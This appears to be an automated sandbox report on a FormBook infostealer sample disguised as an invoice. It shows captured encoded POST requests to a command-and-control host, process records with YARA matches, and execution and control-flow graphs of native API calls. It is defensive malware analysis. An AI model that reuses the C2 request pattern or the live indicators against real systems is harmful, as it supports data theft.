                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18192.168.2.650002154.197.162.23980
                                              TimestampBytes transferredDirectionData
                                              Jan 2, 2025 09:20:03.289849043 CET775OUTPOST /cf9p/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.investshares.net
                                              Origin: http://www.investshares.net
                                              Cache-Control: max-age=0
                                              Content-Length: 231
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.investshares.net/cf9p/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 35 38 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6e 6e 58 6c 4c 34 43 71 5a 51 6a 32 41 38 30 4f 38 32 33 74 43 6f 64 32 4e 5a 6d 73 61 4d 71 69 2f 2f 65 55 70 50 65 69 42 71 32 7a 6d 48 70 71 67 63 4c 62 44 65 67 4f 48 2b 55 77 65 62 6c 51 62 76 45 59 5a 39 58 61 48 5a 2f 56 6d 4d 44 64 58 72 73 67 42 66 4c 32 39 43 55 38 30 77 35 79 41 4a 46 7a 45 71 56 6a 51 68 71 71 43 7a 65 48 6a 42 30 34 38 39 72 47 65 61 47 72 4a 49 36 6c 65 41 61 69 35 4a 4f 67 75 34 34 73 5a 72 30 6d 43 5a 72 45 4f 67 31 53 52 47 41 38 67 2f 49 2b 38 6e 6a 62 43 56 59 79 43 4c 6d 52 70 65 75 43 50 65 36 6c 58 61 53 43 54 71 30 39 4a 44 70 6c 31 72 6f 73 2f 53 49 49 67 58 33 4a 4e 74 39 71 41 56 79 6e 37 77 3d 3d
                                              Data Ascii: 58=gmPPOGT6pgqjnnXlL4CqZQj2A80O823tCod2NZmsaMqi//eUpPeiBq2zmHpqgcLbDegOH+UweblQbvEYZ9XaHZ/VmMDdXrsgBfL29CU80w5yAJFzEqVjQhqqCzeHjB0489rGeaGrJI6leAai5JOgu44sZr0mCZrEOg1SRGA8g/I+8njbCVYyCLmRpeuCPe6lXaSCTq09JDpl1ros/SIIgX3JNt9qAVyn7w==
                                              Jan 2, 2025 09:20:03.855519056 CET309INHTTP/1.1 403 Forbidden
                                              Server: nginx
                                              Date: Wed, 01 Jan 2025 16:19:27 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19192.168.2.650003154.197.162.23980
                                              TimestampBytes transferredDirectionData
                                              Jan 2, 2025 09:20:05.834670067 CET1788OUTPOST /cf9p/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.investshares.net
                                              Origin: http://www.investshares.net
                                              Cache-Control: max-age=0
                                              Content-Length: 1243
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.investshares.net/cf9p/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 35 38 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6e 6e 58 6c 4c 34 43 71 5a 51 6a 32 41 38 30 4f 38 32 33 74 43 6f 64 32 4e 5a 6d 73 61 4d 69 69 2f 4a 4b 55 6f 75 65 69 41 71 32 7a 6c 48 70 72 67 63 4b 44 44 65 70 48 48 2b 52 4e 65 64 70 51 55 76 59 59 4a 4d 58 61 4f 5a 2f 56 6b 4d 44 59 64 4c 73 70 42 66 62 36 39 43 6b 38 30 77 35 79 41 50 70 7a 45 2b 42 6a 4c 68 71 70 54 7a 65 62 75 68 31 56 38 39 79 35 65 61 54 55 49 34 61 6c 65 67 4b 69 37 66 69 67 74 59 34 71 59 72 30 2b 43 5a 6d 47 4f 67 70 34 52 46 64 5a 67 2f 73 2b 2b 44 57 6c 52 6d 67 31 41 71 2b 79 38 63 61 45 43 35 4f 4b 52 4b 57 70 44 73 31 4f 4b 69 45 4d 39 4f 63 53 78 6a 70 33 74 32 72 42 4c 4e 4d 70 55 68 66 66 6e 2b 70 6d 51 59 51 6b 31 55 42 73 72 56 7a 2b 54 63 63 38 67 53 45 2f 4e 41 54 56 58 6e 5a 53 50 58 4f 68 55 46 66 55 75 47 44 62 44 71 4b 66 35 4f 53 56 74 54 4a 6e 6a 4f 2f 4a 71 50 6d 36 74 59 68 6b 56 53 52 54 70 72 6e 32 5a 70 7a 54 76 79 77 37 75 55 6a 38 36 6b 4c 39 57 31 6c 41 72 71 44 57 45 6f 32 62 6e 4d 4e 78 38 2b 49 [TRUNCATED]
                                              Data Ascii: 58=gmPPOGT6pgqjnnXlL4CqZQj2A80O823tCod2NZmsaMii/JKUoueiAq2zlHprgcKDDepHH+RNedpQUvYYJMXaOZ/VkMDYdLspBfb69Ck80w5yAPpzE+BjLhqpTzebuh1V89y5eaTUI4alegKi7figtY4qYr0+CZmGOgp4RFdZg/s++DWlRmg1Aq+y8caEC5OKRKWpDs1OKiEM9OcSxjp3t2rBLNMpUhffn+pmQYQk1UBsrVz+Tcc8gSE/NATVXnZSPXOhUFfUuGDbDqKf5OSVtTJnjO/JqPm6tYhkVSRTprn2ZpzTvyw7uUj86kL9W1lArqDWEo2bnMNx8+I5X5VF7yxnVwtBBP2TYhnPx9lw6kVL0ZkMISQtieYUlR639d9OOLn5p3b6+KaptBL/1FdCYPBRENsxXODl1pjEkcy848zQxh2rS1ljgshYdyDCUtAJV9ZfkvQYevEQD5WWEbeVOlY0fg4Hv47JVNdck8UrR52Yev0VsMS7HqbwKr+oysbfX1SWPGSQmIIbiBnhUO23KfSkQWBjwzobYTcZ02ew/zZYXx2YK9gVVh/TccGcbLG2C2Rp9doETKhIHarqeari1Cc0SG1udzuHep4zmvGFGIX4EEz+NU1DPX84fxWpRH41K/iw9gusoFVvhxutPL2f/qrHoSpLCnkYJDyekf/FkBvWqj4THnWNvWFF/2nlFVXWCQvqfb+SsIH2cAZah3yQGDIq7ic1H/EjNHhAk8JrhZhu+MhEf2aONCeacg5giI4ne4k5rN9+PHUYkBawLi4ZqQPo8YtfDlDsOOcYUNpplF+VLKK1cuVMq1j3Xc8DF7ocXMU/R4scRF1F5ZbuXEbNflgI1N1tou+hMtaA91AWoEN+ieEXTm18plL3Wx1AYlimpMSMYQHDiKDO/r+7Wbx8lhBe5jXpAJgN0n+LVX5M0X4c3nYdQbpp6Rn8xQoi8q9TVgmmvKwizGqpy6PCOuJBfumKdDEGnzW7uFF8dnB2sybGmdTDg [TRUNCATED]
                                              Jan 2, 2025 09:20:06.418879032 CET309INHTTP/1.1 403 Forbidden
                                              Server: nginx
                                              Date: Wed, 01 Jan 2025 16:19:29 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:03:17:57
                                              Start date:02/01/2025
                                              Path:C:\Users\user\Desktop\inv#12180.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\inv#12180.exe"
                                              Imagebase:0x8f0000
                                              File size:289'280 bytes
                                              MD5 hash:CD504BDAA0159B25FDEA4B248BB76FA8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2502674902.0000000001780000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2501936553.00000000008F1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2503026134.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:03:18:28
                                              Start date:02/01/2025
                                              Path:C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe"
                                              Imagebase:0x6b0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3359820951.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:5
                                              Start time:03:18:30
                                              Start date:02/01/2025
                                              Path:C:\Windows\SysWOW64\fc.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\fc.exe"
                                              Imagebase:0x8e0000
                                              File size:22'528 bytes
                                              MD5 hash:4D5F86B337D0D099E18B14F1428AAEFF
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3359525839.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3358673454.0000000002970000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3358452668.00000000006A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              Reputation:moderate
                                              Has exited:false

                                              General

                                              Target ID:7
                                              Start time:03:18:42
                                              Start date:02/01/2025
                                              Path:C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe"
                                              Imagebase:0x6b0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3360691498.0000000002490000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:9
                                              Start time:03:18:55
                                              Start date:02/01/2025
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff728280000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:1.2%
                                                Dynamic/Decrypted Code Coverage:5.2%
                                                Signature Coverage:13.4%
                                                Total number of Nodes:134
                                                Total number of Limit Nodes:9
                                                execution_graph 90860 914e13 90861 914e2f 90860->90861 90862 914e57 90861->90862 90863 914e6b 90861->90863 90864 91cb43 NtClose 90862->90864 90870 91cb43 90863->90870 90866 914e60 90864->90866 90867 914e74 90873 91ed23 RtlAllocateHeap 90867->90873 90869 914e7f 90871 91cb60 90870->90871 90872 91cb71 NtClose 90871->90872 90872->90867 90873->90869 90977 9151a3 90981 9151bc 90977->90981 90978 915204 90979 91ec03 RtlFreeHeap 90978->90979 90980 915214 90979->90980 90981->90978 90982 915247 90981->90982 90984 91524c 90981->90984 90983 91ec03 RtlFreeHeap 90982->90983 90983->90984 90985 91fca3 90986 91fcb3 90985->90986 90987 91fcb9 90985->90987 90990 91ece3 90987->90990 90989 91fcdf 90993 91ce63 90990->90993 90992 91ecfe 90992->90989 90994 91ce80 90993->90994 90995 91ce91 RtlAllocateHeap 90994->90995 90995->90992 90996 91fd03 90997 91ec03 RtlFreeHeap 90996->90997 90998 91fd18 90997->90998 90999 91c143 91000 91c15d 90999->91000 91003 14a2df0 LdrInitializeThunk 91000->91003 91001 91c185 91003->91001 90874 9044f3 90875 90450d 90874->90875 90880 907ca3 90875->90880 90877 90452b 90878 90455f PostThreadMessageW 90877->90878 90879 904570 90877->90879 90878->90879 90881 907cc7 90880->90881 90882 907d03 LdrLoadDll 90881->90882 90883 907cce 90881->90883 90882->90883 90883->90877 91004 90b7c3 91005 90b807 91004->91005 91006 91cb43 NtClose 91005->91006 91007 90b828 91005->91007 91006->91007 91008 90aa63 91009 90aa7b 91008->91009 91011 90aad5 91008->91011 91009->91011 91012 90e993 91009->91012 91013 90e9b9 91012->91013 91017 90eab0 91013->91017 91018 91fd43 RtlAllocateHeap RtlFreeHeap 91013->91018 91015 90ea4e 91016 91c193 LdrInitializeThunk 91015->91016 91015->91017 91016->91017 91017->91011 91018->91015 90884 8f1beb 90885 8f1bf9 90884->90885 90888 920173 90885->90888 90891 91e7b3 90888->90891 90892 91e7d9 90891->90892 90903 8f7583 90892->90903 90894 91e7ef 90902 8f1d8c 90894->90902 90906 90b5d3 90894->90906 90896 91e80e 90900 91e823 90896->90900 90921 91cf03 90896->90921 90899 91e83d 90901 91cf03 ExitProcess 90899->90901 90917 9186d3 90900->90917 90901->90902 90924 906953 90903->90924 90905 8f7590 90905->90894 90907 90b5ff 90906->90907 90948 90b4c3 90907->90948 90910 90b644 90913 90b660 90910->90913 90915 91cb43 NtClose 90910->90915 90911 90b62c 90912 90b637 90911->90912 90914 91cb43 NtClose 90911->90914 90912->90896 90913->90896 90914->90912 90916 90b656 90915->90916 90916->90896 90918 918735 90917->90918 90920 918742 90918->90920 90959 908b13 90918->90959 90920->90899 90922 91cf1d 90921->90922 90923 91cf2a ExitProcess 90922->90923 90923->90900 90926 906970 90924->90926 90925 906989 90925->90905 90926->90925 90928 91d583 90926->90928 90930 91d59d 90928->90930 90929 91d5cc 90929->90925 90930->90929 90935 91c193 90930->90935 90936 91c1b0 90935->90936 90942 14a2c0a 90936->90942 90937 91c1dc 90939 91ec03 90937->90939 90945 91ceb3 90939->90945 90941 91d645 90941->90925 90943 14a2c1f LdrInitializeThunk 90942->90943 90944 14a2c11 90942->90944 90943->90937 90944->90937 90946 91cecd 90945->90946 90947 91cede RtlFreeHeap 90946->90947 90947->90941 90949 90b5b9 90948->90949 90950 90b4dd 90948->90950 90949->90910 90949->90911 90954 91c233 90950->90954 90953 91cb43 NtClose 90953->90949 90955 91c250 90954->90955 90958 14a35c0 LdrInitializeThunk 90955->90958 90956 90b5ad 90956->90953 90958->90956 90960 908b3d 90959->90960 90966 90903b 90960->90966 90967 904173 90960->90967 90962 908c6a 90963 91ec03 RtlFreeHeap 90962->90963 90962->90966 90964 908c82 90963->90964 90965 91cf03 ExitProcess 90964->90965 90964->90966 90965->90966 90966->90920 90971 904193 90967->90971 90969 9041fc 90969->90962 90970 9041f2 90970->90962 90971->90969 90972 90b8e3 RtlFreeHeap LdrInitializeThunk 90971->90972 90972->90970 90973 909258 90974 91cb43 NtClose 90973->90974 90975 909262 90974->90975 90976 14a2b60 LdrInitializeThunk 91019 90402f 91020 903fa6 91019->91020 91020->91019 91021 903fb5 91020->91021 91023 91cdd3 91020->91023 91024 91cdf0 91023->91024 91027 14a2c70 LdrInitializeThunk 91024->91027 91025 91ce18 91025->91021 91027->91025

                                                Executed Functions

                                                Function 00908B13 Relevance: 2.9, Strings: 2, Instructions: 433COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 41 908b13-908b4a call 91eca3 44 908b55-908b87 call 91eca3 call 8f4b43 call 9147b3 41->44 45 908b50 call 91eca3 41->45 52 909046-90904a 44->52 53 908b8d-908bb7 call 91ec53 44->53 45->44 56 908bc2 53->56 57 908bb9-908bc0 53->57 58 908bc4-908bce 56->58 57->58 59 908bd0 58->59 60 908bef-908c01 call 9147e3 58->60 61 908bd3-908bd6 59->61 67 909044-909045 60->67 68 908c07-908c1f call 91e603 60->68 63 908bd8-908bdb 61->63 64 908bdf-908be9 61->64 63->61 66 908bdd 63->66 64->60 66->60 67->52 68->67 71 908c25-908c75 call 904173 68->71 71->67 74 908c7b-908c9b call 91ec03 71->74 77 908ccc-908cce 74->77 78 908c9d-908c9f 74->78 80 908cd7-908cf9 call 90b673 77->80 81 908cd0 77->81 79 908ca1-908caf call 91e173 call 8f70c3 78->79 78->80 88 908cb4-908cb9 79->88 80->67 87 908cff-908d21 call 91c363 80->87 81->80 91 908d26-908d2b 87->91 88->77 90 908cbb-908cca 88->90 92 908d31-908da7 call 91bd03 call 91bdb3 call 91ec53 90->92 91->67 91->92 99 908db0 92->99 100 908da9-908dae 92->100 101 908db2-908de2 99->101 100->101 102 908de8-908dee 101->102 103 908ebe 101->103 105 908df0-908df3 102->105 106 908dfc-908e1d call 91ec53 102->106 104 908ec0 103->104 108 908ec7-908ecb 104->108 105->102 107 908df5-908df7 105->107 114 908e29 106->114 115 908e1f-908e27 106->115 107->104 110 908ed1-908ed5 108->110 111 908ecd-908ecf 108->111 110->108 111->110 113 908ed7-908eeb 111->113 117 908f55-908fa8 call 907c23 * 2 call 91ec23 113->117 118 908eed-908ef2 113->118 116 908e2c-908e41 114->116 115->116 119 908e43 116->119 120 908e54-908e95 call 907ba3 call 91ec53 116->120 149 908faa-908fae 117->149 150 908fcd-908fd2 117->150 122 908ef4-908ef7 118->122 123 908e46-908e49 119->123 146 908e97-908e9c 120->146 147 908e9e 120->147 126 908ef9-908efc 122->126 127 908f0e-908f10 122->127 128 908e52 123->128 129 908e4b-908e4e 123->129 126->127 132 908efe-908f00 126->132 127->122 133 908f12-908f14 127->133 128->120 129->123 134 908e50 129->134 132->127 137 908f02-908f05 132->137 133->117 138 908f16-908f1e 133->138 134->120 137->127 141 908f07 137->141 142 908f23-908f26 138->142 141->127 143 908f28-908f2b 142->143 144 908f4f-908f53 142->144 143->144 148 908f2d-908f2f 143->148 144->117 144->142 151 908ea0-908ebc call 9050a3 146->151 147->151 148->144 154 908f31-908f34 148->154 153 908fda-908fec call 91bf13 149->153 155 908fb0-908fc1 call 8f7133 149->155 152 908fd4 150->152 150->153 151->104 152->153 163 908ff3-909008 call 90b843 153->163 154->144 159 908f36-908f4c 154->159 162 908fc6-908fcb 155->162 159->144 162->150 162->163 166 90900a-909036 call 907ba3 * 2 call 91cf03 163->166 172 90903b-90903e 166->172 172->67
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2501936553.00000000008F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000000.00000002.2501909320.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_8f0000_inv#12180.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: "$"
                                                • API String ID: 0-3758156766
                                                • Opcode ID: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
                                                • Instruction ID: 957008cb7f46162d2e62571639d2b90505f5854f2450dffa34bd46c7870c76e0
                                                • Opcode Fuzzy Hash: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
                                                • Instruction Fuzzy Hash: EFF163B1E0021AAFDB24DF64CC85BEFB7B9AF44300F1485A9E549A7281DB709E45CF91
                                                Function 00907CA3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 173 907ca3-907cbf 174 907cc7-907ccc 173->174 175 907cc2 call 91f7e3 173->175 176 907cd2-907ce0 call 91fde3 174->176 177 907cce-907cd1 174->177 175->174 180 907cf0-907d01 call 91e283 176->180 181 907ce2-907ced call 920083 176->181 186 907d03-907d17 LdrLoadDll 180->186 187 907d1a-907d1d 180->187 181->180 186->187
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00907D15
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2501936553.00000000008F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000000.00000002.2501909320.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_8f0000_inv#12180.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
                                                • Instruction ID: 63ebebd9e6a743642f257c99af4ea51417106f9dc01ef0a6cdd6a648fc77e8a8
                                                • Opcode Fuzzy Hash: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
                                                • Instruction Fuzzy Hash: 81011EB5E4020DABDB10DBE4DD52FEDB7BCAB94304F0085A5E90897281F631EB548B91
                                                Function 0091CB43 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 198 91cb43-91cb7f call 8f4903 call 91dd73 NtClose
                                                APIs
                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0091CB7A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2501936553.00000000008F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000000.00000002.2501909320.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_8f0000_inv#12180.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
                                                • Instruction ID: e15e06d336ae01eb3a4e92bb25a9ddb0d125e887e01318c2ae4995da0e6344df
                                                • Opcode Fuzzy Hash: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
                                                • Instruction Fuzzy Hash: F3E04F752002487BD220EA69DC02F9B775CDFC5710F004555FB58A7142C670791187E1
                                                Function 014A2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 212 14a2b60-14a2b6c LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 922c6e2acdb1897f6abc048e5dbf486ddf002b7b813e05e037677e145c7fa944
                                                • Instruction ID: 6b5eb3f87b8f772ede388a199fa686bc6e8a1b13958d672c2eb85771c647025b
                                                • Opcode Fuzzy Hash: 922c6e2acdb1897f6abc048e5dbf486ddf002b7b813e05e037677e145c7fa944
                                                • Instruction Fuzzy Hash: C690026120240103410571584854656400E97F4201B55C022E1015591DC63589916635
                                                Function 014A2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 214 14a2df0-14a2dfc LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 38bfd7721870e97a8d84264c8f4d7ca44c754e2936d97139d5209905344d27ca
                                                • Instruction ID: e13165985b3b0affc576b380d479a6d487f3fa06bb7d2080261e045dbb865702
                                                • Opcode Fuzzy Hash: 38bfd7721870e97a8d84264c8f4d7ca44c754e2936d97139d5209905344d27ca
                                                • Instruction Fuzzy Hash: 3690023120140513D11171584944747000D97E4241F95C413A0425559DD7668A52A631
                                                Function 014A2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 213 14a2c70-14a2c7c LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3e4e401a284f25b08fda22d30eec023597309844017a4c1676e5bee7153c5dab
                                                • Instruction ID: 7038de5d07d35ba1d443c00ace0aea00fd1b9678c014def232d6b5cff68c8377
                                                • Opcode Fuzzy Hash: 3e4e401a284f25b08fda22d30eec023597309844017a4c1676e5bee7153c5dab
                                                • Instruction Fuzzy Hash: 2E90023120148902D1107158884478A000997E4301F59C412A4425659DC7A589917631
                                                Function 014A35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 215 14a35c0-14a35cc LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
